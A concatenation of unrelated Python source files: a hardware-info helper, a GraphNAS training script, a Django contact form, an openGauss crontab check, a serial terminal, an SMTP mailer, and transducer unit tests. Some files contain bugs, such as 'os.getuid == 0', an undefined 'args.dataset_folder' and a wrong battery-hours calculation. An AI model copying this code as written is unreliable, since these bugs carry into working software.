more: cpus = [proc for proc in computer.Win32_Processor()] gpus = [gpu for gpu in computer.Win32_VideoController()] else: cpus = [proc.name for proc in computer.Win32_Processor()] gpus = [gpu.name for gpu in computer.Win32_VideoController()] return {'cpus': cpus, 'gpus': gpus} else: return None @staticmethod def users(): return psutil.users() @staticmethod def fans_rpm(): if platform.system() == 'Linux': return psutil.sensors_fans() else: return None @staticmethod def battery_info(): info = (list(psutil.sensors_battery())) return {'Percentage': info[0], 'SecondLeft': info[1], 'MinutesLeft': round(info[1]/60), 'HoursLeft': round(info[1]/1440, 2), 'PluggedIn': info[2]} import argparse import torch from models.geo.geo_gnn_ppi_manager import GeoPPIManager # sys.path.extend(['/GraphNAS']) torch.manual_seed(123) torch.cuda.manual_seed_all(123) def build_args(): parser = argparse.ArgumentParser(description='GraphNAS') parser.add_argument('--random_seed', type=int, default=123) parser.add_argument("--cuda", type=bool, default=True, required=False, help="run in cuda mode") # child model parser.add_argument("--in-feats", type=int, default=50, help="number of input features") parser.add_argument("--num-class", type=int, default=121, help="number of output units") parser.add_argument("--dataset", type=str, default="ppi", required=False, help="The input dataset.") parser.add_argument("--epochs", type=int, default=50, help="number of training epochs") 
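# Aside on the "--cuda" argument above (illustrative, not part of this script):
# argparse applies type=bool to the raw string, so "--cuda False" still yields
# True because bool("False") is True. Two standard ways to get a real boolean
# flag; the demo parser and str2bool helper below are only for illustration.
import argparse

def str2bool(v):
    # explicit string-to-bool conversion, accepting a few common spellings
    if isinstance(v, bool):
        return v
    if v.lower() in ("yes", "true", "t", "1"):
        return True
    if v.lower() in ("no", "false", "f", "0"):
        return False
    raise argparse.ArgumentTypeError("boolean value expected")

demo = argparse.ArgumentParser()
demo.add_argument("--cuda", type=str2bool, default=True)     # "--cuda false" now works
demo.add_argument("--residual", action="store_true")         # presence of the flag toggles True
print(demo.parse_args(["--cuda", "false", "--residual"]))    # Namespace(cuda=False, residual=True)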
parser.add_argument("--retrain_epochs", type=int, default=300, help="number of training epochs") parser.add_argument("--multi_label", type=bool, default=False, help="multi_label or single_label task") parser.add_argument("--residual", action="store_false", help="use residual connection") parser.add_argument("--in-drop", type=float, default=0, help="input feature dropout") parser.add_argument("--lr", type=float, default=0.005, help="learning rate") parser.add_argument("--param_file", type=str, default="ppi.pkl", help="learning rate") parser.add_argument("--optim_file", type=str, default="ppi_optim.pkl", help="optimizer save path") parser.add_argument('--weight_decay', type=float, default=0) parser.add_argument('--max_param', type=float, default=5E6) args = parser.parse_args() return args if __name__ == "__main__": actions = ['gat', 'sum', 'elu', 4, 256, 'gat', 'sum', 'elu', 4, 256, 'gat', 'sum', 'linear', 6, 121] args = build_args() manager = GeoPPIManager(args) manager.train(actions) 0 from .models import Contact from django.forms import Textarea from django.forms import ModelForm from django.forms import TextInput from captcha.fields import CaptchaField class ContactForm(ModelForm): captcha = CaptchaField() class Meta: model = Contact fields = ("name", "surname", "nick_name", "alias", "place", "birth_date", "phone_number_one", "phone_number_two", "phone_number_three", "email_one", "email_two", "email_three", "email_four", "telegram_user", "github_user", "bitbucket_user", "facebook_user", "pinterest_user", "twitter_user", "additional_data") widgets = { 'name': TextInput(attrs={'class': 'form-control'}), 'surname': TextInput(attrs={'class': 'form-control'}), 'nick_name': TextInput(attrs={'class': 'form-control'}), 'alias': TextInput(attrs={'class': 'form-control'}), 'place': Textarea(attrs={'class': 'form-control'}), 'birth_date': TextInput(attrs={'class': 'form-control'}), 'phone_number_one': TextInput(attrs={'class': 'form-control'}), 'phone_number_two': TextInput(attrs={'class': 'form-control'}), 'phone_number_three': TextInput(attrs={'class': 'form-control'}), 'email_one': TextInput(attrs={'class': 'form-control'}), 'email_two': TextInput(attrs={'class': 'form-control'}), 'email_three': TextInput(attrs={'class': 'form-control'}), 'email_four': TextInput(attrs={'class': 'form-control'}), 'telegram_user': TextInput(attrs={'class': 'form-control'}), 'github_user': TextInput(attrs={'class': 'form-control'}), 'bitbucket_user': TextInput(attrs={'class': 'form-control'}), 'facebook_user': TextInput(attrs={'class': 'form-control'}), 'pinterest_user': TextInput(attrs={'class': 'form-control'}), 'twitter_user': TextInput(attrs={'class': 'form-control'}), 'additional_data': Textarea(attrs={'class': 'form-control'}) } # -*- coding:utf-8 -*- # Copyright (c) 2020 Huawei Technologies Co.,Ltd. # # openGauss is licensed under Mulan PSL v2. # You can use this software according to the terms # and conditions of the Mulan PSL v2. # You may obtain a copy of Mulan PSL v2 at: # # http://license.coscl.org.cn/MulanPSL2 # # THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, # WITHOUT WARRANTIES OF ANY KIND, # EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, # MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE. # See the Mulan PSL v2 for more details. 
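# Aside on the ContactForm above (a sketch under assumptions, not this
# project's code): instead of repeating TextInput(attrs={'class': 'form-control'})
# for every field, the same CSS class can be attached to all widgets in
# __init__. The base-class name below is hypothetical.
from django import forms

class BootstrapModelForm(forms.ModelForm):
    """Hypothetical base form that tags every widget with the Bootstrap class."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        for field in self.fields.values():
            css = field.widget.attrs.get("class", "")
            field.widget.attrs["class"] = (css + " form-control").strip()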
# ---------------------------------------------------------------------------- import os import subprocess from gspylib.inspection.common import SharedFuncs from gspylib.inspection.common.CheckItem import BaseItem from gspylib.inspection.common.CheckResult import ResultStatus from gspylib.os.gsplatform import g_Platform from gspylib.common.ErrorCode import ErrorCode class CheckCrontabLeft(BaseItem): def __init__(self): super(CheckCrontabLeft, self).__init__(self.__class__.__name__) self.crontabUser = None def preCheck(self): super(CheckCrontabLeft, self).preCheck() if not "crontabUser" in self.threshold.keys(): raise Exception(ErrorCode.GAUSS_530["GAUSS_53013"] % "Threshold crontabUser") self.crontabUser = self.threshold['crontabUser'] def doCheck(self): parRes = "" cmd = g_Platform.getAllCrontabCmd() allCrontab = SharedFuncs.runShellCmd(cmd, self.user) for crontabService in allCrontab.split('\n'): if crontabService.find('om_monitor') >= 0: parRes = "Gauss process om_monitor remains in crontab. " \ "please delete this gauss info." self.result.raw += "%s\n" % crontabService if parRes: self.result.rst = ResultStatus.NG self.result.val = parRes else: self.result.rst = ResultStatus.OK def doSet(self): if os.getuid == 0: cmd = "crontab -l -u '%s'" % self.crontabUser else: cmd = "crontab -l" (status, output) = subprocess.getstatusoutput(cmd) if status != 0 or output.find('om_monitor') < 0: self.result.val = "No gauss process in crontab.\n" return tmpCrondFileName = "gauss_crond_tmp" tmpCrondFile = os.path.join(self.tmpPath, tmpCrondFileName) try: SharedFuncs.createFile(tmpCrondFile, self.tmpPath) SharedFuncs.writeFile(tmpCrondFile, output, self.tmpPath) cmd = "sed -i '/om_monitor/d' %s" % tmpCrondFile SharedFuncs.runShellCmd(cmd) cmd = "crontab %s " % tmpCrondFile if os.getuid == 0: cmd = "su - %s '%s'" % (self.crontabUser, cmd) (status, output) = subprocess.getstatusoutput(cmd) if status != 0: self.result.val = "Failed to cleaned om_monitor in crontab." \ " Error: %s\n" % output + "The cmd is %s " \ % cmd else: self.result.val = "Successfully to cleaned om_monitor " \ "in crontab.\n" SharedFuncs.cleanFile(tmpCrondFile) except Exception as e: if os.path.exists(tmpCrondFile): SharedFuncs.cleanFile(tmpCrondFile) raise Exception(str(e)) # -*- coding: utf-8; -*- # # @file __init__.py # @brief rest sub-package init. Contains common enums. 
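# Sketch of the crontab-cleaning flow used by doSet() above (simplified and
# standalone; function and variable names are illustrative). One detail worth
# noting: os.getuid is a function, so a root check has to call it --
# the bare expression `os.getuid == 0` compares the function object and is
# always False.
import os
import subprocess

def remove_crontab_entries(pattern, user=None):
    """List the crontab, drop lines containing `pattern`, reinstall the rest."""
    # only root may read/write another user's crontab
    as_user = user if (user is not None and os.getuid() == 0) else None
    base = ["crontab"] + (["-u", as_user] if as_user else [])
    listed = subprocess.run(base + ["-l"], capture_output=True, text=True)
    if listed.returncode != 0 or pattern not in listed.stdout:
        return False  # nothing to clean
    kept = "\n".join(line for line in listed.stdout.splitlines()
                     if pattern not in line) + "\n"
    subprocess.run(base + ["-"], input=kept, text=True, check=True)  # "crontab -" reads stdin
    return True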
# @author (INRA UMR1095) # @date 2015-02-10 # @copyright Copyright (c) 2015 INRA # @license MIT (see LICENSE file) # @details from enum import Enum class Method(Enum): def __init__(self, code, safe): self.code = code self.safe = safe GET = (0, False) POST = (1, True) PUT = (2, True) DELETE = (3, True) PATCH = (4, False) OPTIONS = (5, False) HEAD = (6, False) class Format(Enum): def __init__(self, code, accept, verbose): self.code = code self.accept = accept self.verbose = verbose ANY = (0, '*/*', '*/*') TEXT = (1, 'text/plain-text', 'text/plain-text; encoding=utf-8') HTML = (2, 'text/html', 'text/html; encoding=utf-8') JSON = (3, 'application/json', 'application/json; encoding=utf-8') XML = (4, 'application/xml', 'application/xml; encoding=utf-8') MULTIPART = (5, 'multipart/form-data', 'multipart/form-data') @property def content_type(self): return self.accept mindis/timeseries2redis #!/usr/bin/env python # -*- coding: utf-8 -*- VERSION = '0.1' # import sys import os from setuptools import setup, find_packages from setuptools.extension import Extension setup(name='timeseries2redis', version=VERSION, description='timeseries2redis', author='trbck', packages=find_packages(), package_data={'timeseries2redis': ['timeseries2redis.py']}, ) "Fake useragent randomly generates a useragent for fetching a webpage without a browser." __version__ = "0.0.15" #!/usr/bin/env python3 # -*- coding: utf-8 -*- import sys, os import serial import threading import time import signal import builtins def print(*args): builtins.print(*args, sep=' ', end='', file=None, flush=True) exit_terminal = False def exit_sig_handler(sig, frame): print('Got signal to exit') global exit_terminal exit_terminal = True def serial_handler(option): while not exit_terminal: operation = False line = option['port'].readline().decode('utf-8') if len(line) > 0: # pexpect will change the LF to CRLF. # If the original string is CRLF, it will become CRCRLF in pexpect. if os.name == 'nt': if len(line) > 2 and line[-1] == '\n' and line[-2] == '\r': line = line[:-2] + '\n' print(line) operation = True if operation == False: time.sleep(0.1) class SerialTerminal(): """This module provides a simple terminal which can communicate with serial device. 
""" option = { 'port' : None } def __init__(self, port): """[ parameters ] port : pyserial's instance """ if not port.is_open: raise ValueError('serial port doesn\'t open') self.option['port'] = port global exit_terminal exit_terminal = False signal.signal(signal.SIGINT, exit_sig_handler) def start(self): self.serial_thread = threading.Thread(target = serial_handler, args = (self.option,)) self.serial_thread.start() def write(self, data): self.option['port'].write(data.encode('utf-8')) def abort(self): global exit_terminal exit_terminal = True self.serial_thread.join() def is_alive(self): return not exit_terminal if __name__ == '__main__': port = serial.Serial('/dev/ttyUSB0', 115200, timeout=0) terminal = SerialTerminal(port) terminal.start() while terminal.is_alive(): char = sys.stdin.read(1) if char == '\x03': # Ctl-C break if char == '\n': terminal.write('\r') else: terminal.write(char) terminal.abort() port.close() import os import smtplib import datetime from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart from email.mime.base import MIMEBase from email import encoders # Accountinformationen zum Senden der E-Mail Empfaenger = 'ADDRESS@DOMAIN' Absender = 'ADDRESS@DOMAIN' Passwort = 'PASSWORD' smtpserver = smtplib.SMTP('DOMAIN', 587) smtpserver.ehlo() smtpserver.starttls() smtpserver.ehlo # In Account einloggen smtpserver.login(Absender, Passwort) # Aktuelles Datum holen Datum = datetime.date.today() def send(data): msg = MIMEText(data) # Betreff + Datum msg['Subject'] = 'temperaturlog raspi - %s' % Datum.strftime('%b %d %Y') # Absender msg['From'] = Absender #Empfaenger msg['To'] = Empfaenger # E-Mail abschicken smtpserver.sendmail(Absender, [Empfaenger], msg.as_string()) smtpserver.quit() def send_attachment(files): msg = MIMEMultipart()#MIMEText(data) # Betreff + Datum msg['Subject'] = 'Temperatur- und Feuchteverlauf Keller - %s' % Datum.strftime('%b %d %Y') # Absender msg['From'] = Absender #Empfaenger msg['To'] = Empfaenger #Inhalt part= MIMEText('Luftfeuchteverlauf der letzten Zeit') for path in files: part = MIMEBase('application', "octet-stream") with open(path, 'rb') as file: part.set_payload(file.read()) encoders.encode_base64(part) part.add_header('Content-Disposition','attachment; filename="{}"'.format(os.path.basename(path))) msg.attach(part) # E-Mail abschicken smtpserver.sendmail(Absender, [Empfaenger], msg.as_string()) smtpserver.quit() # Copyright 2008-2010 Nokia Siemens Networks Oyj # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. 
"""Module that adds directories needed by Robot to sys.path when imported.""" import sys import os import fnmatch def add_path(path, to_beginning=False, force=False): if _should_be_added(path, force): if to_beginning: sys.path.insert(0, path) else: sys.path.append(path) def remove_path(path): path = _normpath(path) sys.path = [p for p in sys.path if _normpath(p) != path] def _should_be_added(path, force): if (not path) or _find_in_syspath_normalized(path): return False return force or os.path.exists(path) def _find_in_syspath_normalized(path): path = _normpath(path) for element in sys.path: if _normpath(element) == path: return element return None def _normpath(path): return os.path.normcase(os.path.normpath(path)) ROBOTDIR = os.path.dirname(os.path.abspath(__file__)) PARENTDIR = os.path.dirname(ROBOTDIR) add_path(os.path.join(ROBOTDIR, 'libraries'), to_beginning=True, force=True) add_path(PARENTDIR, to_beginning=True) # Handles egg installations if fnmatch.fnmatchcase(os.path.basename(PARENTDIR), 'robotframework-*.egg'): add_path(os.path.dirname(PARENTDIR), to_beginning=True) # Remove ROBOTDIR dir to disallow importing robot internal modules directly remove_path(ROBOTDIR) # Elements from PYTHONPATH. By default it is not processed in Jython and in # Python valid non-absolute paths may be ignored. PYPATH = os.environ.get('PYTHONPATH') if PYPATH: for path in PYPATH.split(os.pathsep): add_path(path) del path # Current dir (it seems to be in Jython by default so let's be consistent) add_path('.') del _find_in_syspath_normalized, _normpath, add_path, remove_path, ROBOTDIR, PARENTDIR, PYPATH import enum __all__ = [ "load" ] def load_local(config): from mediaman.services.local import service as localservice return localservice.LocalService(config) def load_drive(config): # Apply monkey patches first from mediaman.patches.drive import patch_googleapiclient patch_googleapiclient.patch_googleapiclient_http() from mediaman.services.drive import service as driveservice return driveservice.DriveService(config) class ServiceType(enum.Enum): FOLDER = "folder" GOOGLE_DRIVE = "google drive" DROPBOX = "dropbox" AWS_S3 = "aws s3" AWS_GLACIER = "aws glacier" SERVICE_TYPE_TO_LOADER = { ServiceType.FOLDER: load_local, ServiceType.GOOGLE_DRIVE: load_drive, } def load(service_type: ServiceType, config): try: return SERVICE_TYPE_TO_LOADER[service_type](config) except KeyError as exc: print(f"No service loader configured for {service_type}!") raise from datetime import datetime from unittest import TestCase from uhlive.stream.recognition import events from .recog_events import ( grammar_defined, method_failed, params_set, recognition_complete, session_opened, ) class TestEventDeserialization(TestCase): def test_session_opened(self): event = events.deserialize(session_opened) self.assertIsInstance(event, events.Opened) self.assertEqual(event.request_id, 0) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertIsNone(event.completion_cause) self.assertIsNone(event.completion_reason) self.assertIsNone(event.body) def test_grammar_defined(self): event = events.deserialize(grammar_defined) self.assertIsInstance(event, events.GrammarDefined) self.assertEqual(event.request_id, 1) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertIsNone(event.completion_cause) self.assertIsNone(event.completion_reason) self.assertIsNone(event.body) def test_params_set(self): event = events.deserialize(params_set) self.assertIsInstance(event, 
events.ParamsSet) self.assertEqual(event.request_id, 2) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertIsNone(event.completion_cause) self.assertIsNone(event.completion_reason) self.assertIsNone(event.body) def test_recognition_complete(self): event = events.deserialize(recognition_complete) self.assertIsInstance(event, events.RecognitionComplete) self.assertEqual(event.request_id, 3) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertEqual(event.completion_cause, events.CompletionCause.Success) self.assertIsNone(event.completion_reason) result = event.body self.assertIsInstance(result, events.RecogResult) self.assertIsInstance(result.asr, events.Transcript) self.assertIsInstance(result.nlu, events.Interpretation) self.assertEqual(result.grammar_uri, "session:immat") self.assertEqual(result.nlu.value, "bc305fz") self.assertEqual( result.asr.transcript, "attendez alors voilà baissé trois cent cinq f z" ) self.assertEqual(result.asr.start, datetime(2021, 8, 20, 10, 5, 34, 909000)) def test_method_failed(self): event = events.deserialize(method_failed) self.assertIsInstance(event, events.MethodFailed) self.assertEqual(event.request_id, 2) self.assertEqual(event.channel_id, "testuie46e4ui6") self.assertEqual(event.headers, {}) self.assertEqual(event.completion_cause, events.CompletionCause.GramLoadFailure) self.assertEqual(event.completion_reason, "unknown grammar 'toto'") def test_event_str(self): # We just want to be sure we don't raise exceptions event = events.deserialize(session_opened) print(event) event = events.deserialize(grammar_defined) print(event) event = events.deserialize(params_set) print(event) event = events.deserialize(recognition_complete) print(event) event = events.deserialize(method_failed) print(event) preDefogData.py import argparse import re import os import shutil def get_arguments(): """Parse the arguments from the command line. Returns: Parsed arguments """ parser = argparse.ArgumentParser( description='Script for the preparation of dehaze dataset') parser.add_argument('--clear_folder', default='ITS_v2/clear', help='Folder with dehaze clear datasets') parser.add_argument('--hazy_folder', default='ITS_v2/hazy', help='Folder with dehaze hazy datasets') return parser.parse_args() def checkDir(dirPath): if not os.path.exists(dirPath): os.makedirs(dirPath) def main(): args = get_arguments() if not os.path.exists(args.clear_folder): raise FileNotFoundError('Folder %s not found!' % args.dataset_folder) if not os.path.exists(args.hazy_folder): raise FileNotFoundError('Folder %s not found!' 
% args.dataset_folder) norainDir_train = 'defog_dataset/train_datasets/norain' rainDir_train = 'defog_dataset/train_datasets/rain/X2' norainDir_test = 'defog_dataset/test_datasets/norain' rainDir_test = 'defog_dataset/test_datasets/rain/X2' checkDir('defog_dataset') checkDir('defog_dataset/train_datasets') checkDir('defog_dataset/test_datasets') checkDir('defog_dataset/train_datasets/rain') checkDir('defog_dataset/test_datasets/rain') checkDir(norainDir_train) checkDir(norainDir_test) checkDir(rainDir_train) checkDir(rainDir_test) # prepare clear files for train and test for clear_files in os.listdir(args.clear_folder): oldname = os.path.join(args.clear_folder, clear_files) for i in range(10): j = i + 1 newfile=clear_files[0:len(clear_files)-4]+'_'+str(j)+'.png' if (int)(clear_files.split('.')[0]) <= 1360: newfile_path=os.path.join(norainDir_train,newfile) else: newfile_path=os.path.join(norainDir_test,newfile) shutil.copyfile(oldname,newfile_path) # prepare hazy files for train and test for hazy_files in os.listdir(args.hazy_folder): oldname = os.path.join(args.hazy_folder, hazy_files) newfile = hazy_files[0: len(hazy_files) - len(hazy_files.split('_')[2]) - 1] + 'x2.png' if (int)(hazy_files.split('_')[0]) <= 1360: newname = os.path.join(rainDir_train, newfile) else: newname = os.path.join(rainDir_test, newfile) shutil.copyfile(oldname,newname) shutil.rmtree(args.clear_folder) shutil.rmtree(args.hazy_folder) if __name__ == '__main__': main() #!/usr/bin/env python3 """ Unittests for index preservation """ from unittest import main, TestCase from g2p.mappings import Mapping from g2p.transducer import Transducer class IndicesTest(TestCase): ''' Basic Transducer Test Preserve character-level mappings: Test Case #1 # Simple conversion 0 1 2 3 t e s t p e s t 0 1 2 3 [ ((0, 't'), (0, 'p')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] Test Case #2: # Allow for deletion of segments 0 1 2 3 t e s t t s t 0 1 2 [ ((0, 't'), (0, 't')), ((1, 'e'), (1, '')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] Test Case #3 # Allow for one-to-many 0 1 2 3 t e s t c h e s t 0 1 2 3 4 [ ((0, 't'), (0, 'c')), ((0, 't'), (1, 'h')), ((1, 'e'), (2, 'e')), ((2, 's'), (3, 's')), ((3, 't'), (4, 't')) ] Test Case #4 # Allow for many-to-one 0 1 2 3 t e s t p s t 0 1 2 [ ((0, 't'), (0, 'p')), ((1, 'e'), (0, 'p')), ((2, 's'), (1, 's')), ((3, 't'), (2, 't')) ] Test Case #5 # Allow for epenthesis 0 1 2 3 t e s t t e s t y 0 1 2 3 4 [ ((-1, 'y'), (4, 'y')), ((0, 't'), (0, 't')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] Test Case #6 # Allow metathesis 0 1 2 3 t e s t t s e t 0 1 2 3 [ ((0, 't'), (0, 't')), ((1, 'e'), (2, 'e')), ((2, 's'), (1, 's')), ((3, 't'), (3, 't')) ] Test Case #7 # Allow order-sensitive operations 0 1 2 3 t e s t t e s h t 0 1 2 3 4 t e s t 0 1 2 3 AS IS [ ((0, 't'), (0, 't')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((3, 't'), (3, 't')) ] or not [ ((0, 't'), (0, 't')), ((1, 'e'), (1, 'e')), ((2, 's'), (2, 's')), ((2, 's'), (3, 'h')), ((3, 't'), (4, 't')) ] Test Case #8 # Allow multiple processes which alter the indices 0 1 2 3 t e s t c h e s t 0 1 2 3 4 c h e s s 0 1 2 3 4 [ ((0, 't'), (0, 'c')), ((1, 'e'), (1, 'h')), ((1, 'e'), (2, 'e')), ((2, 's'), (3, 's')), ((3, 't'), (4, 's')) ] ''' def setUp(self): self.test_mapping_one = Mapping( [{'in': 't', "out": 'p', 'context_after': 'e'}]) self.test_mapping_two = Mapping([{"in": 'e', "out": ""}]) self.test_mapping_three = Mapping( [{"in": 't', 'out': 'ch', 'context_after': 'e'}]) self.test_mapping_four = 
Mapping([{'in': 'te', 'out': 'p'}]) self.test_mapping_five = Mapping( [{'context_before': 't', 'context_after': '$', 'in': '', 'out': 'y'}]) self.test_mapping_six = Mapping( [{"in": "e{1}s{2}", "out": "s{2}e{1}"}] ) self.test_mapping_seven = Mapping( [{"in": "s", "out": "sh"}, {"in": "sh", "out": "s"}], rule_ordering="apply-longest-first" ) self.test_mapping_seven_as_written = Mapping( [{"in": "s", "out": "sh"}, {"in": "sh", "out": "s"}]) self.test_mapping_eight = Mapping([{"in": "te", "out": "che"}, {"in": "t", "out": "s"}]) self.test_mapping_nine = Mapping([{'in': 'aa', 'out': ''}]) self.test_mapping_ten = Mapping([{'in': 'abc', 'out': 'a'}]) self.test_mapping_combining = Mapping( [{'in': 'k{1}\u0313{2}', 'out': "'{2}k{1}"}]) self.test_mapping_wacky = Mapping( [{"in": "\U0001f600{1}\U0001f603\U0001f604{2}\U0001f604{3}", "out": "\U0001f604\U0001f604\U0001f604{2}\U0001f604{3}\U0001f604{1}"}] ) self.test_mapping_wacky_lite = Mapping( [{"in": "a{1}bc{2}c{3}", "out": "ccc{2}c{3}c{1}"}] ) self.test_mapping_circum = Mapping( [{'in': 'a{1}c{2}', 'out': 'c{2}a{1}c{2}'}] ) self.trans_one = Transducer(self.test_mapping_one) self.trans_two = Transducer(self.test_mapping_two) self.trans_three = Transducer(self.test_mapping_three) self.trans_four = Transducer(self.test_mapping_four) self.trans_five = Transducer(self.test_mapping_five) self.trans_six = Transducer(self.test_mapping_six) self.trans_seven = Transducer(self.test_mapping_seven) self.test_seven_as_written = Transducer(self.test_mapping_seven_as_written) self.trans_eight = Transducer(self.test_mapping_eight) self.trans_nine = Transducer(self.test_mapping_nine) self.trans_ten = Transducer(self.test_mapping_ten) self.trans_combining = Transducer(self.test_mapping_combining) self.trans_wacky = Transducer(self.test_mapping_wacky) self.trans_wacky_lite = Transducer(self.test_mapping_wacky_lite) self.trans_circum = Transducer(self.test_mapping_circum) def test_no_indices(self): """ Test straightforward conversion without returning indices. """ transducer = self.trans_combining('k\u0313am') self.assertEqual(transducer.output_string, "'kam") def test_combining(self): """ Test index preserving combining characters """ transducer = self.trans_combining('k\u0313am') self.assertEqual(transducer.output_string, "'kam") self.assertEqual(transducer.edges, [(0, 1), (1, 0), (2, 2), (3, 3)]) def test_wacky(self): """ Test weird Unicode emoji transformation... 
""" transducer_lite = self.trans_wacky_lite( 'abcc') transducer_lite_extra = self.trans_wacky_lite( 'abcca') self.assertEqual( transducer_lite.output_string, 'ccccc') self.assertEqual( transducer_lite_extra.output_string, 'ccccca') self.assertEqual( transducer_lite.edges, [(0, 4), (1, 0), (2, 1), (2, 2), (3, 3)]) self.assertEqual( transducer_lite_extra.edges, [(0, 4), (1, 0), (2, 1), (2, 2), (3, 3), (4, 5)]) transducer_no_i = self.trans_wacky( '\U0001f600\U0001f603\U0001f604\U0001f604') self.assertEqual( transducer_no_i.output_string, '\U0001f604\U0001f604\U0001f604\U0001f604\U0001f604') transducer = self.trans_wacky( '\U0001f600\U0001f603\U0001f604\U0001f604') self.assertEqual( transducer.output_string, '\U0001f604\U0001f604\U0001f604\U0001f604\U0001f604') self.assertEqual( transducer.edges, [(0, 4), (1, 0), (2, 1), (2, 2), (3, 3)]) def test_circum(self): """ Test circumfixing """ transducer = self.trans_circum('ac') self.assertEqual(transducer.output_string, 'cac') self.assertEqual(transducer.edges, [(0, 1), (1, 0), (1, 2)]) def test_case_one(self): """ Test case one """ transducer = self.trans_one('test') self.assertEqual(transducer.output_string, 'pest') self.assertEqual(transducer.edges, [(0, 0), (1, 1), (2, 2), (3, 3)]) def test_case_two(self): transducer = self.trans_two('test') self.assertEqual(transducer.output_string, 'tst') self.assertEqual(transducer.edges, [(0, 0), (1, None), (2, 1), (3, 2)]) def test_case_three(self): transducer = self.trans_three('test') self.assertEqual(transducer.output_string, 'chest') self.assertEqual(transducer.edges, [(0, 0), (0, 1), (1, 2), (2, 3), (3, 4)]) def test_case_four(self): transducer = self.trans_four('test') self.assertEqual(transducer.output_string, 'pst') self.assertEqual(transducer.edges, [(0, 0), (1, 0), (2, 1), (3, 2)]) def test_case_six(self): transducer = self.trans_six('test') self.assertEqual(transducer.output_string, 'tset') self.assertEqual(transducer.edges, [(0, 0), (1, 2), (2, 1), (3, 3)]) def test_case_long_six(self): transducer = self.trans_six('esesse') self.assertEqual(transducer.output_string, 'sesese') def test_case_seven(self): transducer_as_written = self.test_seven_as_written('test') self.assertEqual(transducer_as_written.output_string, 'test') self.assertEqual(transducer_as_written.edges, [ (0, 0), (1, 1), (2, 2), (3, 3)]) transducer = self.trans_seven('test') self.assertEqual(transducer.output_string, 'tesht') self.assertEqual(transducer.edges, [(0, 0), (1, 1), (2, 2), (2, 3), (3, 4)]) def test_case_eight(self): transducer = self.trans_eight('test') self.assertEqual(transducer.output_string, 'chess') self.assertEqual(transducer.edges, [(0, 0), (1, 1), (1, 2), (2, 3), (3, 4)]) def test_case_nine(self): transducer = self.trans_nine('aa') self.assertEqual(transducer.output_string, '') self.assertEqual(transducer.edges, [(0, None), (1, None)]) def test_case_ten(self): transducer = self.trans_ten('abc') self.assertEqual(transducer.output_string, 'a') self.assertEqual(transducer.edges, [(0, 0), (1, 0), (2, 0)]) def test_case_acdc(self): transducer = Transducer( Mapping([{"in": "a{1}c{2}", "out": "c{2}a{1}c{2}"}])) tg = transducer('acdc') self.assertEqual(tg.output_string, 'cacdc') self.assertEqual(tg.edges, [(0, 1), (1, 0), (1, 2), (2, 3), (3, 4)]) def test_case_acac(self): transducer = Transducer(Mapping([{"in": "ab{1}c{2}", "out": "ab{2}"}])) transducer_default = Transducer( Mapping([{"in": "ab", "out": ""}, {"in": "c", "out": "ab"}])) tg = transducer('abcabc') tg_default = transducer_default('abcabc') 
self.assertEqual(tg.output_string, 'abab') self.assertEqual(tg_default.output_string, 'abab') self.assertEqual(tg.edges, [(0, None), (1, None), (2, 0), (2, 1), (3, None), (4, None), (5, 2), (5, 3)]) self.assertEqual(tg_default.edges, [(0, None), (1, None), (2, 0), (2, 1), (3, None), (4, None), (5, 2), (5, 3)]) if __name__ == "__main__": main() #!/usr/bin/python # ex:set fileencoding=utf-8: from __future__ import unicode_literals from django.db import models # Only needed for permissions class File(models.Model): pass rhofour/InfiniTDBackend import argparse import json import time from pathlib import Path import cattr from infinitd_server.game_config import GameConfig, GameConfigData, CellPos, ConfigId, Row, Col from infinitd_server.battle import Battle from infinitd_server.battleground_state import BattlegroundState from infinitd_server.battle_computer import BattleComputer def main(): parser = argparse.ArgumentParser( description="Small script to time battle calculation.") parser.add_argument('battleInputFile', metavar='file', type=str, help="A JSON file containing a battleground and wave.") parser.add_argument('-i', '--iters', action="store", type=int, default=1) args = parser.parse_args() gameConfigPath = Path('./game_config.json') with open(gameConfigPath) as gameConfigFile: gameConfigData = cattr.structure(json.loads(gameConfigFile.read()), GameConfigData) gameConfig = GameConfig.fromGameConfigData(gameConfigData) # Decode battle input from file with open(args.battleInputFile) as battleInputFile: battleInput = json.loads(battleInputFile.read()) battleground = BattlegroundState.from_dict(battleInput['battleground']) wave = battleInput['wave'] battleComputer = BattleComputer(gameConfig, debug=False) startTime = time.monotonic() for _ in range(args.iters): battleComputer.computeBattle(battleground, wave) duration = time.monotonic() - startTime print(f"Computed the {args.iters} battles in {duration:.3f}s " f"({duration / args.iters:.4f}s each)") if __name__ == "__main__": main() mycdo/__init__.py # -*- coding: utf-8 -*- """ Created on Wed Feb 04, 2015 @author: This module is the python interface to the command line tool of Climate Data Operators (CDO). Each CDO operator is wrapped into a string in a list, and the chain of CDO operators is realized by first adding these individual list together to form a long list and then tranforming the long list into a CDO command string. For example, get_ifile('data.nc') --> ['data.nc'] sel(name='sst') --> ['-selname,sst'] stat('tim','mean') --> ['-timmean'] and get_cdocmd( get_ifile('data.nc') + sel(name='sst') + stat('tim','mean'), ofile1='sst_timmean.nc' ) --> 'cdo -timmean -selname,sst data.nc sst_timmean.nc' Now we can use the os.system function to run the CDO command: os.system('cdo -timmean -selname,sst data.nc sst_timmean.nc') The module is designed such that it can take full advantage of the CDO chain operators. The module requires the CDO command tool as 